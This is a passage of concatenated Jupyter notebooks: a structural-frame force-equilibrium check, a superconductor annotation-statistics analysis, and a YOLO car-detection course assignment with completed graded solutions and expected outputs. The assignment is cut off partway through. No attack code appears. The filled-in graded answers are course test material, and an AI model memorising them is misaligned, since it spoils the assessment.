self.cosx = dx/L
self.cosy = dy/L
table = pd.read_csv(filename('members'))
MEMBERS = {}
for i,m in table.iterrows():
if m.MEMBERID in MEMBERS:
Warn("Member '{}' is multiply defined.".format(m.MEMBERID))
MEMBERS[m.MEMBERID] = Member(m.MEMBERID,NODES[m.NODEJ],NODES[m.NODEK])
try:
lctable = pd.read_csv(filename('load_combinations'))
use_all = False
COMBO = {}
for i,row in lctable.iterrows():
if row.CASE == lcase:
COMBO[row.LOAD.lower()] = row.FACTOR
except OSError:
use_all = True
COMBO = None
COMBO
table = pd.read_csv(filename('node_loads'))
for i,p in table.iterrows():
f = 1.0 if use_all else COMBO.get(p.LOAD.lower(),0.)
dirn = p.DIRN.upper()
if dirn in ['FX','FY','MZ']:
n = NODES[p.NODEID]
a = 'sum'+dirn
setattr(n,a,getattr(n,a,0.)+float(p.F)*f)
else:
Warn("Direction '{}' invalid for node '{}'.".format(dirn,p.NODEID))
try:
table = pd.read_csv(filename('pdelta_forces',lcase))
for i,p in table.iterrows():
n = NODES[p.NODEID]
n.sumFX += p.FX
n.sumFY += p.FY
n.sumMZ += p.MZ
except OSError:
pass
table = pd.read_csv(filename('reaction_forces',lcase))
for i,r in table.iterrows():
n = NODES[r.NODEID]
n.sumFX += 0. if pd.isnull(r.FX) else float(r.FX)
n.sumFY += 0. if pd.isnull(r.FY) else float(r.FY)
n.sumMZ += 0. if pd.isnull(r.MZ) else float(r.MZ)
table
mtable = pd.read_csv(filename('member_end_forces',lcase))
for i,row in mtable.iterrows():
m = MEMBERS[row.MEMBERID]
n = m.nodej
n.sumFX -= row.FXJ*m.cosx - row.FYJ*m.cosy
n.sumFY -= row.FXJ*m.cosy + row.FYJ*m.cosx
n.sumMZ -= row.MZJ
n = m.nodek
n.sumFX -= row.FXK*m.cosx - row.FYK*m.cosy
n.sumFY -= row.FXK*m.cosy + row.FYK*m.cosx
n.sumMZ -= row.MZK
mtable
maxF = max([mtable[c].abs().max() for c in 'FXJ FXK FYJ FYK'.split()])
maxM = max([mtable[c].abs().max() for c in 'MZJ MZK'.split()])
maxF,maxM
sums = pd.DataFrame([(n.id,n.sumFX,n.sumFY,n.sumMZ) for n in NODES.values()],
columns=['ID','sumFX','sumFY','sumMZ']).set_index(['ID'])
sums
lm = 1E-11
sums['sumFX'][sums['sumFX'].abs() <= maxF*lm] = 0
sums['sumFY'][sums['sumFY'].abs() <= maxF*lm] = 0
sums['sumMZ'][sums['sumMZ'].abs() <= maxM*lm] = 0
sums
sums.abs().max()
```
| github_jupyter |
## Annotation analisys (labelling)
This notebook is an attempt to compute dynamic statistics of the Superconductor dataset tags and labels.
```
import csv
import json
import os
import sys
from difflib import SequenceMatcher
from pathlib import Path
from sys import argv
import pysbd
from bs4 import BeautifulSoup, NavigableString, Tag
from grobid_tokenizer import tokenizeSimple
seg = pysbd.Segmenter(language="en")
def process_dir(input):
# xdir = Path('/data/workspace/Suzuki/supercon_files_20190808/iop/data/')
# xmlfiles = [x for x in xdir.glob('**/*.xml')]
# pdffiles = [x for x in xdir.glob('**/*.pdf')]
accumulated_statistics = []
for root, dirs, files in os.walk(input):
for file_ in files:
if not file_.lower().endswith(".xml"):
continue
abs_path = os.path.join(root, file_)
print("Processing: " + str(abs_path))
output_data = process_file(abs_path)
accumulated_statistics.append(output_data)
return accumulated_statistics
def process_file(input):
with open(input, encoding='utf-8') as fp:
doc = fp.read()
soup = BeautifulSoup(doc, 'xml')
entities_statistics = {}
document_statistics = {
'name': Path(input).name,
'path': str(Path(input).absolute()),
'paragraphs': 0,
'sentences': 0,
'tokens': 0,
'entities': 0,
'uniq_entities': 0,
'classes': 0,
'entities_statistics': entities_statistics
}
children = []
for child in soup.tei.children:
if child.name == 'teiHeader':
children.append(child.find_all("title"))
children.extend([subchild.find_all("p") for subchild in child.find_all("abstract")])
children.append(child.find_all("ab", {"type": "keywords"}))
elif child.name == 'text':
children.append([subsubchild for subchild in child.find_all("body") for subsubchild in subchild.children if
type(subsubchild) is Tag])
for child in children:
for pTag in child:
j = 0
paragraphText = ''
document_statistics['paragraphs'] += 1
for item in pTag.contents:
if type(item) == NavigableString:
paragraphText += str(item)
elif type(item) is Tag and item.name == 'rs':
paragraphText += item.text
document_statistics['entities'] += 1
tag_content = item.text
paragraphText += str(item.text)
if 'type' not in item.attrs:
raise Exception("RS without type is invalid. Stopping")
tag_name = item.attrs['type']
if tag_name not in entities_statistics:
entities_statistics[tag_name] = {
'count': 1,
'content_distribution': {
tag_content: 1
}
}
else:
content_ = entities_statistics[tag_name]
content_['count'] += 1
if tag_content not in content_['content_distribution']:
content_['content_distribution'][tag_content] = 1
else:
content_['content_distribution'][tag_content] += 1
document_statistics['tokens'] += len(tokenizeSimple(paragraphText))
document_statistics['classes'] = len(set(entities_statistics.keys()))
document_statistics['sentences'] += len(seg.segment(paragraphText))
uniq_entities = 0
for key in entities_statistics:
uniq_entities += len(entities_statistics[key]['content_distribution'])
document_statistics['uniq_entities'] = uniq_entities
## Cross checks
# Verify that the sum of the content distribution corresponds to the tag distribution
total_entities = 0
for tag in entities_statistics:
count = entities_statistics[tag]['count']
sum_content_distributions = 0
content_distribution_dict = entities_statistics[tag]['content_distribution']
for content in content_distribution_dict:
sum_content_distributions += content_distribution_dict[content]
assert "Number of total entities per tag does not correspond to the sum.", count == sum_content_distributions
total_entities += count
assert "Number of total entities per documnent does not correspond to the sum.", total_entities == \
document_statistics['entities']
return document_statistics
def group_by_with_soft_matching(input_list, threshold):
matching = {}
last_matching = -1
for index_x, x in enumerate(input_list):
unpacked = [y for x in matching for y in matching[x]]
if x not in matching and x not in unpacked:
matching[x] = []
for index_y, y in enumerate(input_list[index_x + 1:]):
if x == y:
continue
if SequenceMatcher(None, x.lower(), y.lower()).ratio() > threshold:
matching[x].append(y)
else:
continue
return matching
def aggregate(entities_statistics, threshold):
"""
Aggregate the statistics by merging content belonging to the same entity:
- variation of expressions (e.g. cuprates, cuprate, Cuprates, ...)
- synonyms (e.g. 111, cuprates, ...)
:param document_statistics:
:param threshold:
:return: an aggregated statistics for documents
"""
agg = {}
for tag in entities_statistics:
if tag == 'tcValue' or tag == 'pressure':
continue
distribution = entities_statistics[tag]["content_distribution"]
content_list = sorted(distribution.keys())
# hash_list = []
# for content in content_list:
# hash_value = content.lower().replace(" ", "")
# hash_list.append((hash_value, content))
aggregated = group_by_with_soft_matching(content_list, threshold)
agg[tag] = aggregated
assert "Total number of element does not corresponds with the aggregated ones", len(content_list) == (
len(agg.keys()) + len([y for x in aggregated for y in aggregated[x]]))
return agg
def extract_csv(output_data):
entity_statistics = output_data['entities_statistics']
csv_rows = []
for tag in entity_statistics:
for content in entity_statistics[tag]['content_distribution']:
row = [tag, content, entity_statistics[tag]['content_distribution'][content]]
csv_rows.append(row)
return csv_rows
def intersection(lst1, lst2):
# Use of hybrid method
temp = set(lst2)
lst3 = [value for value in lst1 if value in temp]
return lst3
def extract_inconsistencies(output_data):
entity_statistics = output_data['entities_statistics']
summary_content = {}
for tag in entity_statistics:
for content in entity_statistics[tag]['content_distribution']:
if tag in summary_content:
summary_content[tag].append(content)
else:
summary_content[tag] = [content]
inconsistencies = []
tags = list(summary_content.keys())
for id1 in range(0, len(tags)):
for id2 in range(id1 + 1, len(tags)):
tag1 = tags[id1]
tag2 = tags[id2]
tag1_content = summary_content[tag1]
tag2_content = summary_content[tag2]
intersected_content = intersection(tag1_content, tag2_content)
if len(intersected_content) > 0:
for intersected_content_ in intersected_content:
frequency1 = entity_statistics[tag1]['content_distribution'][intersected_content_]
frequency2 = entity_statistics[tag2]['content_distribution'][intersected_content_]
intersected_tags = [(tag1, frequency1), (tag2, frequency2)]
inconsistencies.append([intersected_content_, tag1, frequency1, tag2, frequency2])
return inconsistencies
def find_longest_entities(output_data, topValues=10):
print(output_data)
```
Analysis
```
def run_analysis(input):
output_data = {}
input_path = Path(input)
documents_statistics = process_dir(input_path)
aggregated_entities_statistics = {}
output_data = {
'path': str(Path(input_path).absolute()),
'files': len(documents_statistics),
'paragraphs': 0,
'sentences': 0,
'tokens': 0,
'entities': 0,
'uniq_entities': 0,
'classes': 0,
'entities_statistics': aggregated_entities_statistics
}
classes = []
## Summary of all articles
for document_statistics in documents_statistics:
output_data['paragraphs'] += document_statistics['paragraphs']
output_data['sentences'] += document_statistics['sentences']
output_data['tokens'] += document_statistics['tokens']
output_data['entities'] += document_statistics['entities']
output_data['uniq_entities'] += document_statistics['uniq_entities']
for tag in document_statistics['entities_statistics']:
classes.append(tag)
tag_statistics = document_statistics['entities_statistics'][tag]
if tag not in aggregated_entities_statistics:
aggregated_entities_statistics[tag] = tag_statistics
else:
count = tag_statistics['count']
aggregated_entities_statistics[tag]['count'] += count
dist = tag_statistics['content_distribution']
aggregated_distribution = aggregated_entities_statistics[tag]['content_distribution']
for content in dist:
if content not in aggregated_distribution:
aggregated_distribution[content] = dist[content]
else:
aggregated_distribution[content] += dist[content]
output_data['classes'] = len(set(classes))
output_data['documents'] = documents_statistics
output_data['aggregated_statistics'] = aggregate(aggregated_entities_statistics, 0.90)
output_data["inconsistencies"] = extract_inconsistencies(output_data)
#find_longest_entities(output_data)
return output_data
```
Run Analysis
```
input = "../data/annotated"
result = run_analysis(input)
```
Extract summary on class repartition by frequency
```
columns=['files', 'paragraphs', 'sentences', 'tokens', 'entities', 'uniq_entities', 'classes']
rows = [result[c] for c in columns]
import pandas as pd
pd.DataFrame([rows], columns=columns)
import json
aggregated_statistics = result['aggregated_statistics']
entities_statistics = result['entities_statistics']
# print(json.dumps(entities_statistics, indent=4))
labels = []
values = []
for label in entities_statistics.keys():
labels.append(label)
values.append(entities_statistics[label]['count'])
## PIE
import matplotlib.pyplot as plt
import numpy as np
def func(pct, allvals):
absolute = int(pct/100.*np.sum(allvals))
return "{:.1f}%\n({:d})".format(pct, absolute)
fig, ax = plt.subplots(figsize=(4, 8), subplot_kw=dict(aspect="equal"))
wedges, texts, autotexts = ax.pie(values, autopct=lambda pct: func(pct, values),
textprops=dict(color="w"))
ax.legend(wedges, labels,
title="Labels",
loc="center left",
bbox_to_anchor=(1, 0, 0.5, 1))
plt.setp(autotexts, size=8, weight="bold")
ax.set_title("Class repartition by frequency")
plt.show()
## HISTOGRAM
plt.rcdefaults()
fig, ax = plt.subplots()
ax.barh(labels, values, align='center')
ax.set_yticklabels(labels)
ax.invert_yaxis() # labels read top-to-bottom
ax.set_xlabel('Frequency')
ax.set_title('Class repartition by frequency')
plt.show()
#csv_row = extract_csv(output_data)
```
# Inconsistencies
In the following section we show annotations that have been annotated in different ways.
For example if a certain name "xyz" has been annotated twice with two different annotations, it is listed under here.
This doesn't means necessarly it's an error. We can conclude that the inconsistency tc-material can be attributed to mistakes, while material-class is due to ambiguities and overlapping in the definition of both labels where the outcome depends strongly from the context.
```
inconsistent_classes = result["inconsistencies"]
# print(inconsistent_classes)
rows = inconsistent_classes
columns=['name', 'class 1', 'frequency', 'class 2', 'frequency']
import pandas as pd
pd.DataFrame(rows, columns=columns)
```
The following code identifies content in entities that it's length is more than 400% the average length of the content for each class.
```
import pprint
# pprint.PrettyPrinter().pprint(result['entities_statistics'])
for label, value in result['entities_statistics'].items():
print(label)
average = 0
total = 0
for content, count in result['entities_statistics'][label]['content_distribution'].items():
average += len(content)
total +=1
average = average / total
for content, count in result['entities_statistics'][label]['content_distribution'].items():
if((len(content) / average) * 100) > 400:
print(content)
print("")
```
# Label summary
In this section we analise each label and we output
- top terms
- the aggregation of similar terms using soft-matching
```
def plot_top_10(label, statistics):
class_statistics = statistics[label]
class_count = class_statistics['count']
print("count: " + str(class_count))
class_frequency = class_statistics['content_distribution']
sorted_by_value = {k: v for k, v in sorted(class_frequency.items(), key=lambda item: item[1], reverse=True)}
top_10 = {k:sorted_by_value[k] for k in list(sorted_by_value.keys())[0:10]}
# print(json.dumps(top_10, indent=4))
## HISTOGRAM
plt.rcdefaults()
fig, ax = plt.subplots()
items = list(top_10.values())
keys = list(top_10.keys())
ax.barh(keys, items , align='center')
ax.set_yticklabels(keys)
ax.invert_yaxis() # labels read top-to-bottom
ax.set_xlabel('Frequency')
ax.set_title(label +' annotation values top terms')
plt.show()
def aggregate_by_soft_matching(statistics, aggregated):
# agg_statistics_soft_matching = aggregated[label]
# print(json.dumps(agg_statistics_soft_matching, indent=4))
delete = []
for k, v in aggregated.items():
if len(v) > 0:
for val in v:
statistics[k] += statistics[val]
statistics[val] = 0
delete.append(val)
# print(json.dumps(stat, indent=4))
print("Aggregating " + str(len(delete)) + " elements")
return statistics
```
## Class
the label `<class> `
```
import copy
entities_statistics = copy.copy(result['entities_statistics'])
# print(json.dumps(entities_statistics['class'], indent=4))
# plot_top_10('class', entities_statistics)
content_distribution = entities_statistics["class"]['content_distribution']
aggregated_statistics = result['aggregated_statistics']["class"]
entities_statistics["class"]['content_distribution'] = aggregate_by_soft_matching(content_distribution, aggregated_statistics)
## TODO update count
# Aggregated statistics via soft-matching
# print(json.dumps(result, indent=4))
# with open("bao.json", 'w') as f:
# json.dump(result, f, indent=4)
# print(json.dumps(entities_statistics["class"]['content_distribution'], indent=4))
plot_top_10("class", entities_statistics)
#print(json.dumps(entities_statistics["class"], indent=4))
# agg_statistics_soft_matching_inv_map = {v: k for k, v in agg_statistics_soft_matching.items()}
# print(json.dumps(agg_statistics_soft_matching_inv_map, indent=4))
```
## Material
the label `<material> `
```
import copy
entities_statistics = copy.copy(result['entities_statistics'])
aggregated_statistics = result['aggregated_statistics']['material']
content_distribution = entities_statistics["material"]['content_distribution']
entities_statistics["material"]['content_distribution'] = aggregate_by_soft_matching(content_distribution, aggregated_statistics)
plot_top_10("material", entities_statistics)
```
## Class (from Materials) distribution
```
import copy
entities_statistics = copy.copy(result['entities_statistics'])
aggregated_statistics = result['aggregated_statistics']['material']
content_distribution = entities_statistics["material"]['content_distribution']
entities_statistics["material"]['content_distribution'] = aggregate_by_soft_matching(content_distribution, aggregated_statistics)
entities_statistics["material"]['content_distribution']
# plot_top_10("material", entities_statistics)
```
## Critical temperature expressions
the label `<tc>`
```
import copy
entities_statistics = copy.copy(result['entities_statistics'])
aggregated_statistics = result['aggregated_statistics']['tc']
content_distribution = entities_statistics["tc"]['content_distribution']
#entities_statistics["tc"]['content_distribution'] = aggregate_by_soft_matching(content_distribution, aggregated_statistics)
plot_top_10("tc", entities_statistics)
```
## Measurement Methods
the label `<me_methods>`
```
import copy
entities_statistics = copy.copy(result['entities_statistics'])
name = 'me_method'
aggregated_statistics = result['aggregated_statistics'][name]
content_distribution = entities_statistics[name]['content_distribution']
entities_statistics[name]['content_distribution'] = aggregate_by_soft_matching(content_distribution, aggregated_statistics)
plot_top_10(name, entities_statistics)
local_distribution = copy.copy(entities_statistics[name]['content_distribution'])
classes = {
"specific heat": {
"total":0,
"values": [],
"names": ["heat", "therm"]
},
"magnetic susceptibility": {
"total":0,
"values": [],
"names": ["susceptibilit"]
},
"resistivity": {
"total":0,
"values": [],
"names": ["resistivit", "resistance", "electrical"]
},
"magnetisation": {
"total":0,
"values": [],
"names": ["magneti"]
},
"empirical calculation": {
"total":0,
"values": [],
"names": ["calcula", "predict", "theor"]
}
}
not_assigned = []
assigned = False
for key in local_distribution.keys():
for key_class, value in classes.items():
for names in value['names']:
if names in str.lower(key):
classes[key_class]["values"].append(key_class)
classes[key_class]["total"] += local_distribution[key]
assigned = True
break
if assigned:
break
if assigned == False:
not_assigned.append(key)
else:
assigned = False
## HISTOGRAM
plt.rcdefaults()
fig, ax = plt.subplots()
items = [classes[c]["total"] for c in classes]
keys = list(classes.keys())
ax.barh(keys, items , align='center')
ax.set_yticklabels(keys)
ax.invert_yaxis() # labels read top-to-bottom
ax.set_xlabel('Frequency')
ax.set_title(label +' annotation aggregated distribution')
plt.show()
print("Not assigned to any class: ")
print(not_assigned)
```
## Pressure
the label `<pressure>`
```
entities_statistics = result['entities_statistics']
plot_top_10('pressure', entities_statistics)
```
## Critical temperature value
the label `<tcValue>`
```
entities_statistics = result['entities_statistics']
plot_top_10('tcValue', entities_statistics)
```
| github_jupyter |
# Autonomous driving - Car detection
Welcome to your week 3 programming assignment. You will learn about object detection using the very powerful YOLO model. Many of the ideas in this notebook are described in the two YOLO papers: Redmon et al., 2016 (https://arxiv.org/abs/1506.02640) and Redmon and Farhadi, 2016 (https://arxiv.org/abs/1612.08242).
**You will learn to**:
- Use object detection on a car detection dataset
- Deal with bounding boxes
Run the following cell to load the packages and dependencies that are going to be useful for your journey!
```
import argparse
import os
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
import scipy.io
import scipy.misc
import numpy as np
import pandas as pd
import PIL
import tensorflow as tf
from keras import backend as K
from keras.layers import Input, Lambda, Conv2D
from keras.models import load_model, Model
from yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes, scale_boxes
from yad2k.models.keras_yolo import yolo_head, yolo_boxes_to_corners, preprocess_true_boxes, yolo_loss, yolo_body
%matplotlib inline
```
**Important Note**: As you can see, we import Keras's backend as K. This means that to use a Keras function in this notebook, you will need to write: `K.function(...)`.
## 1 - Problem Statement
You are working on a self-driving car. As a critical component of this project, you'd like to first build a car detection system. To collect data, you've mounted a camera to the hood (meaning the front) of the car, which takes pictures of the road ahead every few seconds while you drive around.
<center>
<video width="400" height="200" src="nb_images/road_video_compressed2.mp4" type="video/mp4" controls>
</video>
</center>
<caption><center> Pictures taken from a car-mounted camera while driving around Silicon Valley. <br> We would like to especially thank [drive.ai](https://www.drive.ai/) for providing this dataset! Drive.ai is a company building the brains of self-driving vehicles.
</center></caption>
<img src="nb_images/driveai.png" style="width:100px;height:100;">
You've gathered all these images into a folder and have labelled them by drawing bounding boxes around every car you found. Here's an example of what your bounding boxes look like.
<img src="nb_images/box_label.png" style="width:500px;height:250;">
<caption><center> <u> **Figure 1** </u>: **Definition of a box**<br> </center></caption>
If you have 80 classes that you want YOLO to recognize, you can represent the class label $c$ either as an integer from 1 to 80, or as an 80-dimensional vector (with 80 numbers) one component of which is 1 and the rest of which are 0. The video lectures had used the latter representation; in this notebook, we will use both representations, depending on which is more convenient for a particular step.
In this exercise, you will learn how YOLO works, then apply it to car detection. Because the YOLO model is very computationally expensive to train, we will load pre-trained weights for you to use.
## 2 - YOLO
YOLO ("you only look once") is a popular algoritm because it achieves high accuracy while also being able to run in real-time. This algorithm "only looks once" at the image in the sense that it requires only one forward propagation pass through the network to make predictions. After non-max suppression, it then outputs recognized objects together with the bounding boxes.
### 2.1 - Model details
First things to know:
- The **input** is a batch of images of shape (m, 608, 608, 3)
- The **output** is a list of bounding boxes along with the recognized classes. Each bounding box is represented by 6 numbers $(p_c, b_x, b_y, b_h, b_w, c)$ as explained above. If you expand $c$ into an 80-dimensional vector, each bounding box is then represented by 85 numbers.
We will use 5 anchor boxes. So you can think of the YOLO architecture as the following: IMAGE (m, 608, 608, 3) -> DEEP CNN -> ENCODING (m, 19, 19, 5, 85).
Lets look in greater detail at what this encoding represents.
<img src="nb_images/architecture.png" style="width:700px;height:400;">
<caption><center> <u> **Figure 2** </u>: **Encoding architecture for YOLO**<br> </center></caption>
If the center/midpoint of an object falls into a grid cell, that grid cell is responsible for detecting that object.
Since we are using 5 anchor boxes, each of the 19 x19 cells thus encodes information about 5 boxes. Anchor boxes are defined only by their width and height.
For simplicity, we will flatten the last two last dimensions of the shape (19, 19, 5, 85) encoding. So the output of the Deep CNN is (19, 19, 425).
<img src="nb_images/flatten.png" style="width:700px;height:400;">
<caption><center> <u> **Figure 3** </u>: **Flattening the last two last dimensions**<br> </center></caption>
Now, for each box (of each cell) we will compute the following elementwise product and extract a probability that the box contains a certain class.
<img src="nb_images/probability_extraction.png" style="width:700px;height:400;">
<caption><center> <u> **Figure 4** </u>: **Find the class detected by each box**<br> </center></caption>
Here's one way to visualize what YOLO is predicting on an image:
- For each of the 19x19 grid cells, find the maximum of the probability scores (taking a max across both the 5 anchor boxes and across different classes).
- Color that grid cell according to what object that grid cell considers the most likely.
Doing this results in this picture:
<img src="nb_images/proba_map.png" style="width:300px;height:300;">
<caption><center> <u> **Figure 5** </u>: Each of the 19x19 grid cells colored according to which class has the largest predicted probability in that cell.<br> </center></caption>
Note that this visualization isn't a core part of the YOLO algorithm itself for making predictions; it's just a nice way of visualizing an intermediate result of the algorithm.
Another way to visualize YOLO's output is to plot the bounding boxes that it outputs. Doing that results in a visualization like this:
<img src="nb_images/anchor_map.png" style="width:200px;height:200;">
<caption><center> <u> **Figure 6** </u>: Each cell gives you 5 boxes. In total, the model predicts: 19x19x5 = 1805 boxes just by looking once at the image (one forward pass through the network)! Different colors denote different classes. <br> </center></caption>
In the figure above, we plotted only boxes that the model had assigned a high probability to, but this is still too many boxes. You'd like to filter the algorithm's output down to a much smaller number of detected objects. To do so, you'll use non-max suppression. Specifically, you'll carry out these steps:
- Get rid of boxes with a low score (meaning, the box is not very confident about detecting a class)
- Select only one box when several boxes overlap with each other and detect the same object.
### 2.2 - Filtering with a threshold on class scores
You are going to apply a first filter by thresholding. You would like to get rid of any box for which the class "score" is less than a chosen threshold.
The model gives you a total of 19x19x5x85 numbers, with each box described by 85 numbers. It'll be convenient to rearrange the (19,19,5,85) (or (19,19,425)) dimensional tensor into the following variables:
- `box_confidence`: tensor of shape $(19 \times 19, 5, 1)$ containing $p_c$ (confidence probability that there's some object) for each of the 5 boxes predicted in each of the 19x19 cells.
- `boxes`: tensor of shape $(19 \times 19, 5, 4)$ containing $(b_x, b_y, b_h, b_w)$ for each of the 5 boxes per cell.
- `box_class_probs`: tensor of shape $(19 \times 19, 5, 80)$ containing the detection probabilities $(c_1, c_2, ... c_{80})$ for each of the 80 classes for each of the 5 boxes per cell.
**Exercise**: Implement `yolo_filter_boxes()`.
1. Compute box scores by doing the elementwise product as described in Figure 4. The following code may help you choose the right operator:
```python
a = np.random.randn(19*19, 5, 1)
b = np.random.randn(19*19, 5, 80)
c = a * b # shape of c will be (19*19, 5, 80)
```
2. For each box, find:
- the index of the class with the maximum box score ([Hint](https://keras.io/backend/#argmax)) (Be careful with what axis you choose; consider using axis=-1)
- the corresponding box score ([Hint](https://keras.io/backend/#max)) (Be careful with what axis you choose; consider using axis=-1)
3. Create a mask by using a threshold. As a reminder: `([0.9, 0.3, 0.4, 0.5, 0.1] < 0.4)` returns: `[False, True, False, False, True]`. The mask should be True for the boxes you want to keep.
4. Use TensorFlow to apply the mask to box_class_scores, boxes and box_classes to filter out the boxes we don't want. You should be left with just the subset of boxes you want to keep. ([Hint](https://www.tensorflow.org/api_docs/python/tf/boolean_mask))
Reminder: to call a Keras function, you should use `K.function(...)`.
```
# GRADED FUNCTION: yolo_filter_boxes
def yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = .6):
"""Filters YOLO boxes by thresholding on object and class confidence.
Arguments:
box_confidence -- tensor of shape (19, 19, 5, 1)
boxes -- tensor of shape (19, 19, 5, 4)
box_class_probs -- tensor of shape (19, 19, 5, 80)
threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
Returns:
scores -- tensor of shape (None,), containing the class probability score for selected boxes
boxes -- tensor of shape (None, 4), containing (b_x, b_y, b_h, b_w) coordinates of selected boxes
classes -- tensor of shape (None,), containing the index of the class detected by the selected boxes
Note: "None" is here because you don't know the exact number of selected boxes, as it depends on the threshold.
For example, the actual output size of scores would be (10,) if there are 10 boxes.
"""
# Step 1: Compute box scores
### START CODE HERE ### (≈ 1 line)
box_scores = box_confidence * box_class_probs
### END CODE HERE ###
# Step 2: Find the box_classes thanks to the max box_scores, keep track of the corresponding score
### START CODE HERE ### (≈ 2 lines)
box_classes = K.argmax(box_scores, axis=-1)
box_class_scores = K.max(box_scores, axis=-1)
### END CODE HERE ###
# Step 3: Create a filtering mask based on "box_class_scores" by using "threshold". The mask should have the
# same dimension as box_class_scores, and be True for the boxes you want to keep (with probability >= threshold)
### START CODE HERE ### (≈ 1 line)
filtering_mask = (box_class_scores >= threshold)
### END CODE HERE ###
# Step 4: Apply the mask to scores, boxes and classes
### START CODE HERE ### (≈ 3 lines)
scores = tf.boolean_mask(box_class_scores, filtering_mask)
boxes = tf.boolean_mask(boxes, filtering_mask)
classes = tf.boolean_mask(box_classes, filtering_mask)
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_a:
box_confidence = tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([19, 19, 5, 4], mean=1, stddev=4, seed = 1)
box_class_probs = tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = 0.5)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.shape))
print("boxes.shape = " + str(boxes.shape))
print("classes.shape = " + str(classes.shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
10.7506
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[ 8.42653275 3.27136683 -0.5313437 -4.94137383]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
7
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(?,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(?, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(?,)
</td>
</tr>
</table>
### 2.3 - Non-max suppression ###
Even after filtering by thresholding over the classes scores, you still end up a lot of overlapping boxes. A second filter for selecting the right boxes is called non-maximum suppression (NMS).
<img src="nb_images/non-max-suppression.png" style="width:500px;height:400;">
<caption><center> <u> **Figure 7** </u>: In this example, the model has predicted 3 cars, but it's actually 3 predictions of the same car. Running non-max suppression (NMS) will select only the most accurate (highest probabiliy) one of the 3 boxes. <br> </center></caption>
Non-max suppression uses the very important function called **"Intersection over Union"**, or IoU.
<img src="nb_images/iou.png" style="width:500px;height:400;">
<caption><center> <u> **Figure 8** </u>: Definition of "Intersection over Union". <br> </center></caption>
**Exercise**: Implement iou(). Some hints:
- In this exercise only, we define a box using its two corners (upper left and lower right): `(x1, y1, x2, y2)` rather than the midpoint and height/width.
- To calculate the area of a rectangle you need to multiply its height `(y2 - y1)` by its width `(x2 - x1)`.
- You'll also need to find the coordinates `(xi1, yi1, xi2, yi2)` of the intersection of two boxes. Remember that:
- xi1 = maximum of the x1 coordinates of the two boxes
- yi1 = maximum of the y1 coordinates of the two boxes
- xi2 = minimum of the x2 coordinates of the two boxes
- yi2 = minimum of the y2 coordinates of the two boxes
- In order to compute the intersection area, you need to make sure the height and width of the intersection are positive, otherwise the intersection area should be zero. Use `max(height, 0)` and `max(width, 0)`.
In this code, we use the convention that (0,0) is the top-left corner of an image, (1,0) is the upper-right corner, and (1,1) the lower-right corner.
```
# GRADED FUNCTION: iou
def iou(box1, box2):
"""Implement the intersection over union (IoU) between box1 and box2
Arguments:
box1 -- first box, list object with coordinates (x1, y1, x2, y2)
box2 -- second box, list object with coordinates (x1, y1, x2, y2)
"""
# Calculate the (y1, x1, y2, x2) coordinates of the intersection of box1 and box2. Calculate its Area.
### START CODE HERE ### (≈ 5 lines)
xi1 = max(box1[0], box2[0])
yi1 = max(box1[1], box2[1])
xi2 = min(box1[2], box2[2])
yi2 = min(box1[3], box2[3])
inter_area = abs(max((xi2 - xi1),0)*max((yi2 - yi1),0))
### END CODE HERE ###
# Calculate the Union area by using Formula: Union(A,B) = A + B - Inter(A,B)
### START CODE HERE ### (≈ 3 lines)
box1_area = (max(box1[0], box1[2]) - min(box1[0], box1[2])) * (max(box1[1], box1[3]) - min(box1[1], box1[3]))
box2_area = (max(box2[0], box2[2]) - min(box2[0], box2[2])) * (max(box2[1], box2[3]) - min(box2[1], box2[3]))
union_area = box1_area + box2_area - inter_area
### END CODE HERE ###
# compute the IoU
### START CODE HERE ### (≈ 1 line)
iou = inter_area / union_area
### END CODE HERE ###
return iou
box1 = (2, 1, 4, 3)
box2 = (1, 2, 3, 4)
print("iou = " + str(iou(box1, box2)))
```
**Expected Output**:
<table>
<tr>
<td>
**iou = **
</td>
<td>
0.14285714285714285
</td>
</tr>
</table>
You are now ready to implement non-max suppression. The key steps are:
1. Select the box that has the highest score.
2. Compute its overlap with all other boxes, and remove boxes that overlap it more than `iou_threshold`.
3. Go back to step 1 and iterate until there's no more boxes with a lower score than the current selected box.
This will remove all boxes that have a large overlap with the selected boxes. Only the "best" boxes remain.
**Exercise**: Implement yolo_non_max_suppression() using TensorFlow. TensorFlow has two built-in functions that are used to implement non-max suppression (so you don't actually need to use your `iou()` implementation):
- [tf.image.non_max_suppression()](https://www.tensorflow.org/api_docs/python/tf/image/non_max_suppression)
- [K.gather()](https://www.tensorflow.org/api_docs/python/tf/gather)
```
# GRADED FUNCTION: yolo_non_max_suppression
def yolo_non_max_suppression(scores, boxes, classes, max_boxes = 10, iou_threshold = 0.5):
"""
Applies Non-max suppression (NMS) to set of boxes
Arguments:
scores -- tensor of shape (None,), output of yolo_filter_boxes()
boxes -- tensor of shape (None, 4), output of yolo_filter_boxes() that have been scaled to the image size (see later)
classes -- tensor of shape (None,), output of yolo_filter_boxes()
max_boxes -- integer, maximum number of predicted boxes you'd like
iou_threshold -- real value, "intersection over union" threshold used for NMS filtering
Returns:
scores -- tensor of shape (, None), predicted score for each box
boxes -- tensor of shape (4, None), predicted box coordinates
classes -- tensor of shape (, None), predicted class for each box
Note: The "None" dimension of the output tensors has obviously to be less than max_boxes. Note also that this
function will transpose the shapes of scores, boxes, classes. This is made for convenience.
"""
max_boxes_tensor = K.variable(max_boxes, dtype='int32') # tensor to be used in tf.image.non_max_suppression()
